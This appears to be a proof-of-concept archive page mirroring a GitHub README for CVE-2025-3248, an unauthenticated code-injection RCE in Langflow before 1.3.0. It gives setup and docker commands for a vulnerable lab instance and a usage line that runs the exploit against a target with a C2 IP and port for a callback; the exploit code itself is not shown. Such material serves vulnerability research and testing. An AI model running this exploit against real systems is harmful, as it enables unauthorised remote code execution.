Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2025-3248 PoC — Langflow 安全漏洞

Source
https://github.com/wand3rlust/CVE-2025-3248
Associated Vulnerability
Title:Langflow 安全漏洞 (CVE-2025-3248)
Description:Langflow是Langflow开源的一个用于构建多代理和 RAG 应用程序的可视化框架。 Langflow 1.3.0之前版本存在安全漏洞,该漏洞源于/api/v1/validate/code端点存在代码注入漏洞,可能导致远程未经验证的攻击者执行任意代码。
Description
PoC for achieving RCE in Langflow versions <1.3.0
Readme
# CVE-2025-3248

## Introduction
Langflow versions prior to 1.3.0 are susceptible to unauthenticated code injection in the /api/v1/validate/code endpoint via Python exec() function.

## Usage

### Configuration

```
git clone https://github.com/wand3rlust/CVE-2025-3248.git
cd CVE-2025-3248/
python3 -m venv venv
pip install -r requirements.txt
```

### Vuln App
```
docker pull langflowai/langflow:1.1.4
docker run -p 7860:7860 langflowai/langflow:1.1.4
```

### Run
```
python3 cve-2025-3248.py <TARGET_URL> <C2_IP> <C2_PORT>
```
E.g.: `python3 cve-2025-3248.py http://10.10.10.1:7860 10.0.13.37 1337`

## References

- Advisory: https://nvd.nist.gov/vuln/detail/CVE-2025-3248
- GitHub: https://github.com/langflow-ai/langflow/security/advisories/GHSA-rvqx-wpfh-mfx7
- Original Exploit: https://www.exploit-db.com/exploits/52262
File Snapshot

 [4.0K]  /data/pocs/787f60cee16c1caa59896b01e826ec13546310d1
├── [2.3K]  cve-2025-3248.py
├── [1.0K]  LICENSE
├── [ 831]  README.md
└── [  87]  requirements.txt

0 directories, 4 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.